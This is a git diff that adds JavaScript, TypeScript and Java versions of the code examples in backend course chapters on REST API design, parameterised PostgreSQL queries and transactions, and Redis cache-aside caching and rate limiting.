+  // Note the `||` rather than `??`: a query param arrives as a string, so
+  // Number('abc') is NaN and Number('') is 0, and both must fall back too.
+  const page = Number(q.page) || 1
+  const limit = Number(q.limit) || 10
+  const sortBy = q.sortBy || 'createdAt'
+  const sortOrder = q.sortOrder || 'descending'
+
+  const filters = {}
+  if (q.status) {
+    filters.status = q.status // ?status=active
+  }
+
+  const { rows, total } = await store.query(filters, sortBy, sortOrder, page, limit)
+  const totalPages = Math.ceil(total / limit)
+
+  res.status(200).json({ data: rows, total, page, totalPages })
+})
+```
+
+```ts
+import type { Request, Response } from 'express'
+
+interface ListPage<T> {
+  data: T[]
+  total: number
+  page: number
+  totalPages: number
+}
+
+// GET /v1/organizations?status=active&sortBy=name&sortOrder=ascending&page=1&limit=10
+export async function listOrganizations(req: Request, res: Response): Promise<void> {
+  const q = req.query
+
+  // --- sane defaults: never crash if the client omits params ---
+  // Everything in `req.query` is `unknown`-ish by nature (a string, an
+  // array of strings, or missing), so each param is coerced once, here,
+  // and the rest of the function works with real numbers and strings.
+  const page = Number(q.page) || 1
+  const limit = Math.min(Number(q.limit) || 10, 100) // and cap it, see below
+  const sortBy = String(q.sortBy ?? 'createdAt')
+  const sortOrder = q.sortOrder === 'ascending' ? 'ascending' : 'descending'
+
+  const filters: Record<string, string> = {}
+  if (typeof q.status === 'string') {
+    filters.status = q.status // ?status=active
+  }
+
+  const { rows, total } = await store.query(filters, sortBy, sortOrder, page, limit)
+
+  const body: ListPage<Organization> = {
+    data: rows,
+    total,
+    page,
+    totalPages: Math.ceil(total / limit),
+  }
+  res.status(200).json(body)
+}
+```
+
+```java
+// GET /v1/organizations?status=active&sortBy=name&sortOrder=ascending&page=1&limit=10
+@GetMapping("/v1/organizations")
+ResponseEntity<?> listOrganizations(
+        // --- sane defaults: never crash if the client omits params ---
+        // defaultValue does the whole job; the param is never null here.
+        @RequestParam(defaultValue = "1")          int page,
+        @RequestParam(defaultValue = "10")         int limit,
+        @RequestParam(defaultValue = "createdAt")  String sortBy,
+        @RequestParam(defaultValue = "descending") String sortOrder,
+        @RequestParam(required = false)            String status) {
+
+    Map<String, String> filters = new HashMap<>();
+    if (status != null) {
+        filters.put("status", status); // ?status=active
+    }
+
+    QueryResult<Organization> result = store.query(filters, sortBy, sortOrder, page, limit);
+    int totalPages = (result.total() + limit - 1) / limit; // ceil division
+
+    return ResponseEntity.ok(Map.of(
+        "data",       result.rows(),
+        "total",      result.total(),
+        "page",       page,
+        "totalPages", totalPages));
+}
 ```
 
 ## Status Codes: done right
@@ -524,7 +747,7 @@ Notice the symmetry: **list** and **create** share the collection URL (`/organiz
 
 ______
 
-GoPython
+Go Python JavaScript TypeScript Java
 
 wiring the full resource / CRUD + custom action
 
@@ -607,6 +830,164 @@ def archive_organization(id: str):
     return store.archive(id)   # flips status + cascades: projects, tasks, emails...
 ```
 
+```js
+import { Router } from 'express'
+
+const router = Router()
+
+// list + create share the collection URL, split by method
+router.get('/v1/organizations', listOrganizations) // (see section 07)
+router.post('/v1/organizations', createOrganization)
+
+// get-one / update / delete share /:id, split by method
+router.get('/v1/organizations/:id', getOrganization)
+router.patch('/v1/organizations/:id', updateOrganization)
+router.delete('/v1/organizations/:id', deleteOrganization)
+
+// custom action: verb at the end of a specific resource
+router.post('/v1/organizations/:id/archive', archiveOrganization)
+
+async function createOrganization(req, res) {
+  const { name, status, description } = req.body
+  const org = await store.insert({
+    name,
+    status: status || 'active', // sane default, don't force the client to send the obvious
+    description,
+  }) // id, createdAt set server-side
+  res.status(201).json(org) // 201 Created + the new entity
+}
+
+async function getOrganization(req, res) {
+  const org = await store.get(req.params.id)
+  if (!org) {
+    return res.status(404).json(errBody('organization not found')) // single id -> 404
+  }
+  res.status(200).json(org)
+}
+
+async function updateOrganization(req, res) {
+  res.status(200).json(await store.update(req.params.id, req.body)) // partial update -> 200
+}
+
+async function deleteOrganization(req, res) {
+  await store.delete(req.params.id)
+  res.sendStatus(204) // No Content
+}
+
+async function archiveOrganization(req, res) {
+  const org = await store.archive(req.params.id) // flips status + cascades: projects, tasks, emails...
+  res.status(200).json(org) // custom action -> 200, NOT 201
+}
+```
+
+```ts
+import { Router, type Request, type Response } from 'express'
+
+const router = Router()
+
+// list + create share the collection URL, split by method
+router.get('/v1/organizations', listOrganizations) // (see section 07)
+router.post('/v1/organizations', createOrganization)
+
+// get-one / update / delete share /:id, split by method
+router.get('/v1/organizations/:id', getOrganization)
+router.patch('/v1/organizations/:id', updateOrganization)
+router.delete('/v1/organizations/:id', deleteOrganization)
+
+// custom action: verb at the end of a specific resource
+router.post('/v1/organizations/:id/archive', archiveOrganization)
+
+// The create body and the stored entity are DIFFERENT types, and saying so
+// is the point: `id` and `createdAt` are server-side, so they are absent
+// from the input type and a client cannot smuggle them in.
+interface CreateOrganization {
+  name: string
+  status?: string
+  description?: string
+}
+
+async function createOrganization(req: Request, res: Response): Promise<void> {
+  const body = req.body as CreateOrganization
+  const org: Organization = await store.insert({
+    name: body.name,
+    status: body.status ?? 'active', // sane default
+    description: body.description,
+  })
+  res.status(201).json(org) // 201 Created + the new entity
+}
+
+async function getOrganization(req: Request, res: Response): Promise<void> {
+  const org = await store.get(req.params.id)
+  if (org === null) {
+    res.status(404).json(errBody('organization not found')) // single id -> 404
+    return
+  }
+  res.status(200).json(org)
+}
+
+async function updateOrganization(req: Request, res: Response): Promise<void> {
+  const patch = req.body as Partial<Organization>
+  res.status(200).json(await store.update(req.params.id, patch)) // partial update -> 200
+}
+
+async function deleteOrganization(req: Request, res: Response): Promise<void> {
+  await store.delete(req.params.id)
+  res.sendStatus(204) // No Content
+}
+
+async function archiveOrganization(req: Request, res: Response): Promise<void> {
+  const org = await store.archive(req.params.id) // flips status + cascades
+  res.status(200).json(org) // custom action -> 200, NOT 201
+}
+```
+
+```java
+@RestController
+@RequestMapping("/v1/organizations") // the collection URL, written once
+class OrganizationController {
+
+    // list + create share the collection URL, split by method
+    @GetMapping
+    ListPage<Organization> list() { /* (see section 07) */ }
+
+    @PostMapping
+    @ResponseStatus(HttpStatus.CREATED) // 201 Created + the new entity
+    Organization create(@RequestBody CreateOrganization body) {
+        String status = (body.status() == null) ? "active" : body.status(); // sane default
+        // id, createdAt set server-side
+        return store.insert(body.name(), status, body.description());
+    }
+
+    // get-one / update / delete share /{id}, split by method
+    @GetMapping("/{id}")
+    Organization getOne(@PathVariable String id) {
+        Organization org = store.get(id);
+        if (org == null) {
+            // single id -> 404
+            throw new ResponseStatusException(HttpStatus.NOT_FOUND, "organization not found");
+        }
+        return org;
+    }
+
+    @PatchMapping("/{id}") // partial update -> 200
+    Organization update(@PathVariable String id, @RequestBody Map<String, Object> body) {
+        return store.update(id, body);
+    }
+
+    @DeleteMapping("/{id}")
+    @ResponseStatus(HttpStatus.NO_CONTENT) // 204, nothing to send back
+    void delete(@PathVariable String id) {
+        store.delete(id);
+    }
+
+    // custom action: verb at the end -> POST, returns 200 (created nothing)
+    @PostMapping("/{id}/archive")
+    Organization archive(@PathVariable String id) {
+        return store.archive(id); // flips status + cascades: projects, tasks, emails...
+    }
+}
+```
+
 ## Golden Rules
 
 ### Extract nouns from the UI first
@@ -615,7 +996,7 @@ Before writing a line of business logic, look at the wireframes (Figma) or talk 
 
 ### Design the interface before coding
 
-A REST API is _designed_, not programmed-first. Lay out routes, payloads, and responses in a tool like **Insomnia** or **Postman** before touching Go, Python, or any framework. The whole point is a delightful, intuitive, unambiguous interface, so the consumer never has to read your source code or guess your behavior by trial and error.
+A REST API is _designed_, not programmed-first. Lay out routes, payloads, and responses in a tool like **Insomnia** or **Postman** before touching Go, Python, Node, Spring, or any other framework. The whole point is a delightful, intuitive, unambiguous interface, so the consumer never has to read your source code or guess your behavior by trial and error.
 
 ### Provide sane defaults
 
@@ -686,7 +1067,7 @@ Don't return stack traces, SQL errors, file paths, or framework exception dumps 
 
 ______
 
-GoPython
+Go Python JavaScript TypeScript Java
 
 one error helper, used everywhere
 
@@ -733,6 +1114,102 @@ error_response(
         {"field": "age",   "issue": "must be >= 0"},
     ],
 )
+```
+
+```js
+function writeError(res, status, code, message, details = []) {
+  res.status(status).json({
+    error: {
+      code,
+      message,
+      details,
+      requestId: res.locals.requestId, // put there by the request-id middleware
+    },
+  }) // SAME shape for every error in the whole API
+}
+
+// usage
+writeError(res, 422, 'validation_failed', 'Some fields are invalid.', [
+  { field: 'email', issue: 'must be a valid email' },
+  { field: 'age', issue: 'must be >= 0' },
+])
+```
+
+```ts
+import type { Response } from 'express'
+
+interface FieldError {
+  field: string
+  issue: string
+}
+
+// Exporting the envelope type is the quiet win here: the client imports
+// the same declaration, so `switch (err.error.code)` is checked against
+// the codes the server can actually send, on both sides of the wire.
+export interface ErrorEnvelope {
+  error: {
+    code: string
+    message: string
+    details: FieldError[]
+    requestId: string
+  }
+}
+
+export function writeError(
+  res: Response,
+  status: number,
+  code: string,
+  message: string,
+  details: FieldError[] = [],
+): void {
+  const body: ErrorEnvelope = {
+    error: { code, message, details, requestId: res.locals.requestId },
+  }
+  res.status(status).json(body) // SAME shape for every error in the whole API
+}
+
+// usage
+writeError(res, 422, 'validation_failed', 'Some fields are invalid.', [
+  { field: 'email', issue: 'must be a valid email' },
+  { field: 'age', issue: 'must be >= 0' },
+])
+```
+
+```java
+// Named ApiFieldError so it does not collide with Spring's own FieldError.
+public record ApiFieldError(String field, String issue) {}
+
+public record ErrorEnvelope(String code, String message,
+                            List<ApiFieldError> details, String requestId) {}
+
+@RestControllerAdvice
+class ApiErrors {
+
+    static ResponseEntity<Map<String, ErrorEnvelope>> writeError(
+            HttpStatus status, String code, String message, List<ApiFieldError> details) {
+        var envelope = new ErrorEnvelope(code, message, details, MDC.get("requestId"));
+        // SAME shape for every error in the whole API
+        return ResponseEntity.status(status).body(Map.of("error", envelope));
+    }
+
+    // The framework's OWN validation failures get funnelled through the same
+    // helper, so a bean-validation error and a hand-written one are
+    // indistinguishable to the client. That is what "consistent" has to mean.
+    @ExceptionHandler(MethodArgumentNotValidException.class)
+    ResponseEntity<?> onInvalid(MethodArgumentNotValidException e) {
+        List<ApiFieldError> details = e.getBindingResult().getFieldErrors().stream()
+            .map(f -> new ApiFieldError(f.getField(), f.getDefaultMessage()))
+            .toList();
+        return writeError(HttpStatus.UNPROCESSABLE_ENTITY,
+            "validation_failed", "Some fields are invalid.", details);
+    }
+}
+
+// usage
+writeError(HttpStatus.UNPROCESSABLE_ENTITY,
+    "validation_failed", "Some fields are invalid.",
+    List.of(new ApiFieldError("email", "must be a valid email"),
+            new ApiFieldError("age", "must be >= 0")));
 ```
 
 <Callout type="info" title="There's a standard for this too">
@@ -1322,4 +1799,4 @@ One resource, three layers, a method-aware router, and an in-memory store behind
 The Backend Lens / Field Manual v2, Chapter 11.\
 Further reading: [MDN / REST](https://developer.mozilla.org/en-US/docs/Glossary/REST) / [MDN / Web APIs](https://developer.mozilla.org/en-US/docs/Web/API) / Roy Fielding's 2000 dissertation on REST.
 
-Backend from First Principles / Chapter 07 / REST. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 07 / REST. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot). The complete worked program at the end is Go only.

--- a/src/content/chapters/08-databases.mdx
+++ b/src/content/chapters/08-databases.mdx
@@ -397,7 +397,7 @@ The vulnerability appears when you build queries by **concatenating strings** wi
 
 ______
 
-SQLGoPython
+SQL Go Python JavaScript TypeScript Java
 
 GET /v1/users/:id, same query, parameter-safe in each layer
 
@@ -428,6 +428,58 @@ cur.execute(
     """,
     (user_id,),  # the driver escapes it; injection is impossible
 )
+```
+
+```js
+// node-postgres: the values live in the ARRAY, never in the string.
+const { rows } = await db.query(
+  `SELECT u.*, to_jsonb(up.*) AS profile
+   FROM users u
+   LEFT JOIN user_profiles up ON u.id = up.user_id
+   WHERE u.id = $1`,
+  [userId], // userId is treated strictly as data, never SQL
+)
+
+// The JavaScript-specific trap: a template literal looks almost identical
+// and IS the injection. These two lines differ by four characters:
+//   WHERE u.id = $1`, [userId]   <- safe, the driver binds it
+//   WHERE u.id = ${userId}`      <- concatenation; you just lost the table
+```
+
+```ts
+import type { Pool } from 'pg'
+
+// The generic types the ROW, so `user.profile` is checked at compile time.
+// Worth being clear about what that does and does not buy you: it checks
+// the shape you claim to get back, not the SQL. The parameter slot is
+// still the only thing standing between you and injection.
+const { rows } = await db.query<UserWithProfile>(
+  `SELECT u.*, to_jsonb(up.*) AS profile
+   FROM users u
+   LEFT JOIN user_profiles up ON u.id = up.user_id
+   WHERE u.id = $1`,
+  [userId], // sent separately; the driver never interpolates it
+)
+const user: UserWithProfile | undefined = rows[0]
+```
+
+```java
+// Spring's JdbcClient: ? is the parameter slot, param() supplies the value.
+Optional<UserWithProfile> user = db.sql("""
+        SELECT u.*, to_jsonb(up.*) AS profile
+        FROM users u
+        LEFT JOIN user_profiles up ON u.id = up.user_id
+        WHERE u.id = ?
+        """)
+    .param(userId) // bound as data; the driver never interpolates it
+    .query(UserWithProfile.class)
+    .optional();
+
+// JPA/Hibernate is the same rule in a different spelling, a named
+// parameter instead of a positional one:
+//   em.createQuery("SELECT u FROM User u WHERE u.id = :id")
+//     .setParameter("id", userId)
+// and the same cardinal sin: never "... WHERE u.id = " + userId.
 ```
 
 ### Insert & update
@@ -579,7 +631,7 @@ Move INR 500 from account A to account B. That's two writes: subtract from A, ad
 
 ______
 
-SQLGoPython
+SQL Go Python JavaScript TypeScript Java
 
 both writes commit together, or neither does
 
@@ -615,6 +667,77 @@ try:
     # reaching here means both writes committed atomically
 finally:
     pool.putconn(conn)
+```
+
+```js
+// A transaction lives on ONE connection. `pool.query` hands out whichever
+// connection is free, so a BEGIN sent that way can easily land on a
+// different connection than the UPDATE that follows it. Check one out.
+const tx = await pool.connect()
+try {
+  await tx.query('BEGIN') // start the transaction
+  await tx.query('UPDATE accounts SET balance = balance - 500 WHERE id = $1', [a]) // debit A
+  await tx.query('UPDATE accounts SET balance = balance + 500 WHERE id = $1', [b]) // credit B
+  await tx.query('COMMIT') // only here do both writes become permanent
+} catch (err) {
+  await tx.query('ROLLBACK') // anything failed -> both reverted
+  throw err
+} finally {
+  tx.release() // the checked-out connection MUST go back to the pool
+}
+```
+
+```ts
+import type { Pool, PoolClient } from 'pg'
+
+// The release() in the finally block is the part that must never be
+// forgotten, and "must never be forgotten" is the signal to write it once.
+// The callback shape also makes the transaction's extent obvious: it is
+// exactly the body of `fn`, no more and no less.
+async function withTransaction<T>(pool: Pool, fn: (tx: PoolClient) => Promise<T>): Promise<T> {
+  const tx = await pool.connect()
+  try {
+    await tx.query('BEGIN')
+    const result = await fn(tx)
+    await tx.query('COMMIT') // only here do the writes become permanent
+    return result
+  } catch (err) {
+    await tx.query('ROLLBACK') // anything failed -> everything reverted
+    throw err
+  } finally {
+    tx.release()
+  }
+}
+
+await withTransaction(pool, async (tx) => {
+  await tx.query('UPDATE accounts SET balance = balance - 500 WHERE id = $1', [a]) // debit A
+  await tx.query('UPDATE accounts SET balance = balance + 500 WHERE id = $1', [b]) // credit B
+})
+```
+
+```java
+// @Transactional IS begin/commit/rollback: Spring opens a transaction
+// before the method body runs, commits when it returns normally, and rolls
+// back if it throws. Both writes are atomic without a BEGIN in sight.
+@Transactional
+public void transfer(long a, long b) {
+    db.sql("UPDATE accounts SET balance = balance - 500 WHERE id = ?")
+      .param(a)
+      .update(); // debit A
+
+    db.sql("UPDATE accounts SET balance = balance + 500 WHERE id = ?")
+      .param(b)
+      .update(); // credit B
+
+    // returning normally commits; any RuntimeException rolls BOTH back
+}
+
+// Two things that surprise people, both worth knowing before you trust it:
+//  1. It works through a proxy, so calling transfer() from another method
+//     of the SAME class skips the proxy and you get two auto-commits.
+//  2. By default it rolls back on RuntimeException but NOT on a checked
+//     exception, which commits the half-done work. Say so explicitly:
+//     @Transactional(rollbackFor = Exception.class)
 ```
 
 ### ACID: the four guarantees
@@ -747,4 +870,4 @@ The Backend Lens / Field Manual v2, Chapter 12.\
 Schema, constraints, trigger, joins and index usage in this chapter were executed and verified against PostgreSQL 16.\
 Companion chapter: 11 / Complete REST API Design (same project-management example).
 
-Backend from First Principles / Chapter 08 / Postgres. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 08 / Postgres. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/09-caching.mdx
+++ b/src/content/chapters/09-caching.mdx
@@ -563,9 +563,13 @@ That is the reason we want to separate this out, for two reasons. First, to make
 
 ## Code Examples
 
-Below are practical implementations of caching patterns using Go and Python, the two languages referenced in this course.
+Below are practical implementations of the patterns from this chapter, each one written out in Go, Python, JavaScript, TypeScript and Java. Pick a tab. What is worth noticing as you switch between them is how little changes: the Redis commands are identical in all five, because the cache has no idea what language is talking to it. The differences are all in how each language spells "wrap this", "this may be missing", and "run this before the handler".
 
-### 10.1: Lazy (Cache-Aside) Caching in Go
+### 10.1: Lazy (Cache-Aside) Caching
+
+Go Python JavaScript TypeScript Java
+
+check the cache, fall back to the database, write what you found
 
 ```go title="cache_aside.go / Go + github.com/redis/go-redis/v9"
 package main
@@ -635,7 +639,216 @@ func UpdateProduct(ctx context.Context, product *Product) error {
 }
 ```
 
-### 10.2: Rate Limiting Middleware in Go
+```python title="cache_aside.py / Python + redis-py"
+import json
+from dataclasses import dataclass, asdict
+
+import redis
+
+r = redis.Redis(host="localhost", port=6379, decode_responses=True)
+
+TTL_SECONDS = 3600  # 1 hour
+
+
+@dataclass
+class Product:
+    id: str
+    name: str
+    price: float
+
+
+def get_product(product_id: str) -> Product:
+    """Cache-Aside (Lazy) caching.
+
+    1. Check Redis first
+    2. On miss, fetch from DB, store in cache, return
+    """
+    cache_key = f"product:{product_id}"
+
+    # Step 1: Try cache first (Cache Hit path)
+    cached = r.get(cache_key)
+    if cached:
+        print("[CACHE HIT]", product_id)
+        return Product(**json.loads(cached))
+
+    # Step 2: Cache Miss, fetch from database (expensive operation)
+    print("[CACHE MISS] fetching from DB...", product_id)
+    product = fetch_from_database(product_id)
+
+    # Step 3: Store in cache with a 1-hour TTL
+    r.setex(cache_key, TTL_SECONDS, json.dumps(asdict(product)))
+
+    return product
+
+
+def update_product(product: Product) -> None:
+    """Write-Through: update DB and cache simultaneously."""
+    # Step 1: Update in database
+    update_in_database(product)
+
+    # Step 2: Write-through, update cache immediately
+    r.setex(f"product:{product.id}", TTL_SECONDS, json.dumps(asdict(product)))
+
+    print("[WRITE-THROUGH] DB + cache updated for", product.id)
+```
+
+```js title="cacheAside.js / Node 20+ + node-redis"
+import { createClient } from 'redis'
+
+const redis = createClient({ url: 'redis://localhost:6379' })
+await redis.connect()
+
+const TTL_SECONDS = 3600 // 1 hour
+
+// getProduct implements Cache-Aside (Lazy) caching.
+// 1. Check Redis first
+// 2. On miss, fetch from DB, store in cache, return
+export async function getProduct(productId) {
+  const cacheKey = `product:${productId}`
+
+  // Step 1: Try cache first (Cache Hit path)
+  const cached = await redis.get(cacheKey)
+  if (cached !== null) {
+    console.log('[CACHE HIT]', productId)
+    return JSON.parse(cached)
+  }
+
+  // Step 2: Cache Miss, fetch from database (expensive operation)
+  console.log('[CACHE MISS] fetching from DB...', productId)
+  const product = await fetchFromDatabase(productId)
+
+  // Step 3: Store in cache with a 1-hour TTL
+  await redis.set(cacheKey, JSON.stringify(product), { EX: TTL_SECONDS })
+
+  return product
+}
+
+// Write-Through: update DB and cache simultaneously
+export async function updateProduct(product) {
+  // Step 1: Update in database
+  await updateInDatabase(product)
+
+  // Step 2: Write-through, update cache immediately
+  await redis.set(`product:${product.id}`, JSON.stringify(product), { EX: TTL_SECONDS })
+
+  console.log('[WRITE-THROUGH] DB + cache updated for', product.id)
+}
+```
+
+```ts title="cacheAside.ts / TypeScript 5+ + node-redis"
+import { createClient } from 'redis'
+
+const redis = createClient({ url: 'redis://localhost:6379' })
+await redis.connect()
+
+interface Product {
+  id: string
+  name: string
+  price: number
+}
+
+const TTL_SECONDS = 3600 // 1 hour
+
+// getProduct implements Cache-Aside (Lazy) caching.
+// 1. Check Redis first
+// 2. On miss, fetch from DB, store in cache, return
+export async function getProduct(productId: string): Promise<Product> {
+  const cacheKey = `product:${productId}`
+
+  // Step 1: Try cache first (Cache Hit path)
+  const cached = await redis.get(cacheKey)
+  if (cached !== null) {
+    console.log('[CACHE HIT]', productId)
+    // Worth pausing on: this cast is a PROMISE, not a check. Redis hands
+    // back a string, and a value written by last month's deploy still has
+    // last month's shape. That is why cache keys get a version in them
+    // ("product:v2:...") the moment the stored shape changes.
+    return JSON.parse(cached) as Product
+  }
+
+  // Step 2: Cache Miss, fetch from database (expensive operation)
+  console.log('[CACHE MISS] fetching from DB...', productId)
+  const product = await fetchFromDatabase(productId)
+
+  // Step 3: Store in cache with a 1-hour TTL
+  await redis.set(cacheKey, JSON.stringify(product), { EX: TTL_SECONDS })
+
+  return product
+}
+
+// Write-Through: update DB and cache simultaneously
+export async function updateProduct(product: Product): Promise<void> {
+  // Step 1: Update in database
+  await updateInDatabase(product)
+
+  // Step 2: Write-through, update cache immediately
+  await redis.set(`product:${product.id}`, JSON.stringify(product), { EX: TTL_SECONDS })
+
+  console.log('[WRITE-THROUGH] DB + cache updated for', product.id)
+}
+```
+
+```java title="ProductService.java / Java 17+ + Spring Data Redis"
+@Service
+public class ProductService {
+    private static final Duration TTL = Duration.ofHours(1);
+
+    private final StringRedisTemplate redis;
+    private final ObjectMapper json;
+    private final ProductRepository db;
+
+    ProductService(StringRedisTemplate redis, ObjectMapper json, ProductRepository db) {
+        this.redis = redis;
+        this.json = json;
+        this.db = db;
+    }
+
+    // getProduct implements Cache-Aside (Lazy) caching.
+    // 1. Check Redis first
+    // 2. On miss, fetch from DB, store in cache, return
+    public Product getProduct(String productId) throws JsonProcessingException {
+        String cacheKey = "product:" + productId;
+
+        // Step 1: Try cache first (Cache Hit path)
+        String cached = redis.opsForValue().get(cacheKey);
+        if (cached != null) {
+            log.info("[CACHE HIT] {}", productId);
+            return json.readValue(cached, Product.class);
+        }
+
+        // Step 2: Cache Miss, fetch from database (expensive operation)
+        log.info("[CACHE MISS] fetching from DB... {}", productId);
+        Product product = db.findById(productId).orElseThrow();
+
+        // Step 3: Store in cache with a 1-hour TTL
+        redis.opsForValue().set(cacheKey, json.writeValueAsString(product), TTL);
+
+        return product;
+    }
+
+    // Write-Through: update DB and cache simultaneously
+    public void updateProduct(Product product) throws JsonProcessingException {
+        // Step 1: Update in database
+        db.save(product);
+
+        // Step 2: Write-through, update cache immediately
+        redis.opsForValue().set("product:" + product.id(),
+            json.writeValueAsString(product), TTL);
+
+        log.info("[WRITE-THROUGH] DB + cache updated for {}", product.id());
+    }
+}
+
+// Spring will also do all of the above declaratively, and the annotation
+// names map straight onto the pattern names: @Cacheable IS cache-aside,
+// @CachePut IS write-through. Section 10.3 shows that version.
+```
+
+### 10.2: Rate Limiting Middleware
+
+Go Python JavaScript TypeScript Java
+
+one atomic INCR per request, per IP, per minute window
 
 ```go title="rate_limiter.go / Go + go-redis"
 package middleware
@@ -693,7 +906,233 @@ func RateLimitMiddleware(rdb *redis.Client) http.HandlerFunc {
 }
 ```
 
-### 10.3: Caching Decorator in Python
+```python title="rate_limiter.py / Python + redis-py + FastAPI"
+import time
+
+import redis
+from fastapi import Request
+from fastapi.responses import JSONResponse
+
+r = redis.Redis(host="localhost", port=6379, decode_responses=True)
+
+MAX_REQUESTS = 50
+WINDOW_SECONDS = 60
+
+
+@app.middleware("http")
+async def rate_limit_middleware(request: Request, call_next):
+    # Extract client IP from X-Forwarded-For header
+    # (set by reverse proxy like Nginx or Caddy)
+    client_ip = request.headers.get("X-Forwarded-For") or request.client.host
+
+    # Redis key: per IP, per minute window
+    key = f"rate_limit:{client_ip}:{int(time.time()) // WINDOW_SECONDS}"
+
+    # INCR is atomic, no race condition even with concurrent requests
+    count = r.incr(key)
+
+    # Set TTL on first request of this window (key is new)
+    if count == 1:
+        r.expire(key, WINDOW_SECONDS)
+
+    # Check if limit exceeded
+    if count > MAX_REQUESTS:
+        return JSONResponse(
+            {"error": "429 Too Many Requests"},
+            status_code=429,
+            headers={"Retry-After": str(WINDOW_SECONDS)},
+        )  # short-circuit: the route handler never runs
+
+    # Proceed to actual handler
+    response = await call_next(request)
+    response.headers["X-RateLimit-Remaining"] = str(MAX_REQUESTS - count)
+    return response
+```
+
+```js title="rateLimiter.js / Node 20+ + node-redis + Express"
+const MAX_REQUESTS = 50
+const WINDOW_SECONDS = 60
+
+export async function rateLimitMiddleware(req, res, next) {
+  // Extract client IP from X-Forwarded-For header
+  // (set by reverse proxy like Nginx or Caddy)
+  const clientIp = req.get('X-Forwarded-For') ?? req.socket.remoteAddress
+
+  // Redis key: per IP, per minute window
+  const window = Math.floor(Date.now() / 1000 / WINDOW_SECONDS)
+  const key = `rate_limit:${clientIp}:${window}`
+
+  // INCR is atomic, no race condition even with concurrent requests
+  const count = await redis.incr(key)
+
+  // Set TTL on first request of this window (key is new)
+  if (count === 1) {
+    await redis.expire(key, WINDOW_SECONDS)
+  }
+
+  // Check if limit exceeded
+  if (count > MAX_REQUESTS) {
+    res.set('Retry-After', String(WINDOW_SECONDS))
+    return res.status(429).send('429 Too Many Requests') // never calls next()
+  }
+
+  // Proceed to actual handler
+  res.set('X-RateLimit-Remaining', String(MAX_REQUESTS - count))
+  next()
+}
+```
+
+```ts title="rateLimiter.ts / TypeScript 5+ + node-redis + Express"
+import type { NextFunction, Request, Response } from 'express'
+
+const MAX_REQUESTS = 50
+const WINDOW_SECONDS = 60
+
+export async function rateLimitMiddleware(
+  req: Request,
+  res: Response,
+  next: NextFunction,
+): Promise<void> {
+  // Extract client IP from X-Forwarded-For header
+  // (set by reverse proxy like Nginx or Caddy)
+  const clientIp = req.get('X-Forwarded-For') ?? req.socket.remoteAddress ?? 'unknown'
+
+  // Redis key: per IP, per minute window
+  const window = Math.floor(Date.now() / 1000 / WINDOW_SECONDS)
+  const key = `rate_limit:${clientIp}:${window}`
+
+  // Both commands in one round trip. That is not just a speed trick: with
+  // a bare INCR followed by a separate EXPIRE, a crash in between leaves a
+  // key with NO TTL, and that IP stays rate-limited forever.
+  const [count] = (await redis
+    .multi()
+    .incr(key) // atomic; no race even with concurrent requests
+    .expire(key, WINDOW_SECONDS)
+    .exec()) as [number, boolean]
+
+  // Check if limit exceeded
+  if (count > MAX_REQUESTS) {
+    res.set('Retry-After', String(WINDOW_SECONDS))
+    res.status(429).send('429 Too Many Requests') // never calls next()
+    return
+  }
+
+  // Proceed to actual handler
+  res.set('X-RateLimit-Remaining', String(MAX_REQUESTS - count))
+  next()
+}
+```
+
+```java title="RateLimitFilter.java / Java 17+ + Spring Data Redis"
+@Component
+public class RateLimitFilter extends OncePerRequestFilter {
+    private static final int MAX_REQUESTS = 50;
+    private static final Duration WINDOW = Duration.ofMinutes(1);
+
+    private final StringRedisTemplate redis;
+
+    RateLimitFilter(StringRedisTemplate redis) {
+        this.redis = redis;
+    }
+
+    @Override
+    protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
+                                    FilterChain chain)
+            throws ServletException, IOException {
+        // Extract client IP from X-Forwarded-For header
+        // (set by reverse proxy like Nginx or Caddy)
+        String clientIp = req.getHeader("X-Forwarded-For");
+        if (clientIp == null) {
+            clientIp = req.getRemoteAddr();
+        }
+
+        // Redis key: per IP, per minute window
+        String key = "rate_limit:%s:%d".formatted(
+            clientIp, Instant.now().getEpochSecond() / WINDOW.toSeconds());
+
+        // INCR is atomic, no race condition even with concurrent requests
+        Long count = redis.opsForValue().increment(key);
+        if (count == null) {
+            res.sendError(HttpServletResponse.SC_INTERNAL_SERVER_ERROR);
+            return;
+        }
+
+        // Set TTL on first request of this window (key is new)
+        if (count == 1L) {
+            redis.expire(key, WINDOW);
+        }
+
+        // Check if limit exceeded
+        if (count > MAX_REQUESTS) {
+            res.setHeader("Retry-After", String.valueOf(WINDOW.toSeconds()));
+            res.sendError(429, "429 Too Many Requests");
+            return; // short-circuit: the controller never runs
+        }
+
+        // Proceed to actual handler
+        res.setHeader("X-RateLimit-Remaining", String.valueOf(MAX_REQUESTS - count));
+        chain.doFilter(req, res);
+    }
+}
+```
+
+### 10.3: Wrapping a Function in a Cache
+
+Every language has some way to say "run this function, but check the cache first", and the name changes with the language: a decorator in Python, a higher-order function in Go and JavaScript, an annotation and a proxy in Java. The three steps inside are always the same ones from section 10.1.
+
+Go Python JavaScript TypeScript Java
+
+the same cache-aside logic, hoisted out of the function it wraps
+
+```go title="cached.go / Go + go-redis + generics"
+// Go has no decorator syntax, so the same idea is a higher-order
+// function: hand it a fetch func, get a cache-aside version back.
+// The generic parameter is what keeps it reusable, the wrapper never
+// needs to know what it is caching.
+func Cached[T any](rdb *redis.Client, key string, ttl time.Duration,
+    fetch func(context.Context) (T, error)) func(context.Context) (T, error) {
+
+    return func(ctx context.Context) (T, error) {
+        var zero T
+
+        // Step 1: Check cache (Cache Hit)
+        if cached, err := rdb.Get(ctx, key).Result(); err == nil {
+            var out T
+            if json.Unmarshal([]byte(cached), &out) == nil {
+                fmt.Println("[CACHE HIT]", key)
+                return out, nil
+            }
+            // Unmarshal failed: a stale shape from an older deploy.
+            // Treat it as a miss rather than failing the request.
+        }
+
+        // Step 2: Cache Miss, execute the actual function
+        fmt.Println("[CACHE MISS] fetching", key)
+        result, err := fetch(ctx)
+        if err != nil {
+            return zero, err
+        }
+
+        // Step 3: Store in Redis with TTL
+        if data, mErr := json.Marshal(result); mErr == nil {
+            rdb.Set(ctx, key, data, ttl)
+        }
+
+        return result, nil
+    }
+}
+
